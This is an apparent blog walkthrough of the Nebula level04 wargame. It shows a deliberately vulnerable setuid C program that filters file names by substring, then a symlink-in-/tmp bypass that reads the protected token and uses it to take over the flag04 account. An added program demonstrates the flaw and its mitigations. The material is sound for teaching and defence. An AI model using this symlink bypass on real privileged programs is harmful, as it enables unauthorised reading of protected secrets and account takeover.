Exploit Exercises: Nebula Level 04

Image of Nebula Terminal

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)

To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>
#include <err.h>   /* declares err(); missing from the listing as shipped */

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
  }

  /* The only access control: a substring test on the argument exactly as typed. */
  if(strstr(argv[1], "token") != NULL) {
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  /* Runs with flag04's privileges (setuid) and follows symlinks. */
  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

Solution

After login we go to the flag account folder.

level04@nebula:~$ cd /home/flag04/
level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04   93 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag04 flag04   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag04 flag04  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag04 flag04   675 May 18  2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20  2011 flag04
-rw------- 1 flag04 flag04    37 Nov 20  2011 token
level04@nebula:/home/flag04$

Hmm, let’s get more info by trying some basic commands.

level04@nebula:/home/flag04$ ls -al
total 13
drwxr-x--- 2 flag04 level04   93 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag04 flag04   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag04 flag04  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag04 flag04   675 May 18  2011 .profile
-rwsr-x--- 1 flag04 level04 7428 Nov 20  2011 flag04
-rw------- 1 flag04 flag04    37 Nov 20  2011 token
level04@nebula:/home/flag04$ file flag04
flag04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
level04@nebula:/home/flag04$ ./flag04
./flag04 [file to read]
level04@nebula:/home/flag04$ cat token
cat: token: Permission denied
level04@nebula:/home/flag04$ ./flag04 token
You may not access 'token'
level04@nebula:/home/flag04$

Permission denied. Really? Not quite. Where can any user create files? In /tmp, and as in the previous tutorials, a link is still a link: the check only looks at the string we pass in, not at the file that string resolves to.

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ls -la /tmp
total 0
drwxrwxrwt 4 root    root    100 Oct 16 13:18 .
drwxr-xr-x 1 root    root    220 Oct 16  2017 ..
drwxrwxrwt 2 root    root     40 Oct 16  2017 .ICE-unix
drwxrwxrwt 2 root    root     40 Oct 16  2017 .X11-unix
lrwxrwxrwx 1 level04 level04  18 Oct 16 13:17 level04 -> /home/flag04/token
level04@nebula:/home/flag04$

That funny moment when you see “lrwxrwxrwx” as the permissions of your symbolic link. Let’s end this.

level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$
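The bypass works because the blocklist in flag04 inspects only the string in argv[1], while open() runs as flag04 and follows whatever that string points at. The C program below is an added example (my own code, not part of the level or of the original post): it creates a constructed "token" file and a symlink to it in a temporary directory, then contrasts the level's name-only check with two mitigations, canonicalising the path with realpath() before checking it, and opening with O_NOFOLLOW followed by an fstat() regular-file check. The function names, the struct and the directory template are assumptions of this example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Blocklist check as written in the level: matches the argument string only. */
int denied_by_name(const char *path) {
    return strstr(path, "token") != NULL;
}

/* Hardened check: canonicalise first, so symlinks and relative paths cannot
   disguise the target. An unresolvable path is denied as well. */
int denied_by_canonical_path(const char *path) {
    char resolved[PATH_MAX];
    if (realpath(path, resolved) == NULL)
        return 1;
    return strstr(resolved, "token") != NULL;
}

/* Open that refuses to follow a symlink in the final path component and then
   verifies that what was opened is a regular file. Returns an fd or -1. */
int open_regular_nofollow(const char *path) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd == -1)
        return -1;
    struct stat st;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* What each check decided for the symlink (1 = denied, fd of -1 = refused). */
typedef struct { int naive_link, canonical_link, nofollow_link_fd; } demo_result;

/* Demonstration harness: builds a constructed "token" file plus a symlink
   named "innocent" in a temporary directory and runs all three checks on
   the symlink, then cleans up. */
demo_result run_demo(void) {
    demo_result r = {0, 0, -1};
    char dir[] = "/tmp/nebula04-demo-XXXXXX";   /* assumed writable location */
    if (mkdtemp(dir) == NULL)
        return r;
    char target[PATH_MAX], link[PATH_MAX];
    snprintf(target, sizeof target, "%s/token", dir);
    snprintf(link, sizeof link, "%s/innocent", dir);
    FILE *f = fopen(target, "w");
    if (f) { fputs("constructed-secret\n", f); fclose(f); }
    if (symlink(target, link) == 0) {
        r.naive_link = denied_by_name(link);             /* 0: "innocent" passes */
        r.canonical_link = denied_by_canonical_path(link); /* 1: resolves to token */
        r.nofollow_link_fd = open_regular_nofollow(link);  /* -1: symlink refused */
        if (r.nofollow_link_fd != -1)
            close(r.nofollow_link_fd);
    }
    unlink(link);
    unlink(target);
    rmdir(dir);
    return r;
}

int main(void) {
    demo_result r = run_demo();
    printf("name-only check on symlink:  %s\n", r.naive_link ? "denied" : "allowed");
    printf("canonical check on symlink:  %s\n", r.canonical_link ? "denied" : "allowed");
    printf("O_NOFOLLOW open of symlink:  %s\n", r.nofollow_link_fd == -1 ? "refused" : "opened");
    return 0;
}
```

Both mitigations are still a blocklist in front of a check-then-open sequence, so a path that changes between realpath() and open() is not covered. The robust design is for a setuid program not to open arbitrary user-supplied paths at all, or to drop privileges before doing so and to decide on the file descriptor it actually obtained (fstat) rather than on the name.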

Now keep in mind that tokens in this exploit tutorial are used as passwords for the flag account.

level04@nebula:/home/flag04$ su flag04
Password:
sh-4.2$ id
uid=995(flag04) gid=995(flag04) groups=995(flag04)
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$

See you in the next tutorial. Share, Like and ask!

This post is licensed under CC BY 4.0 by the author.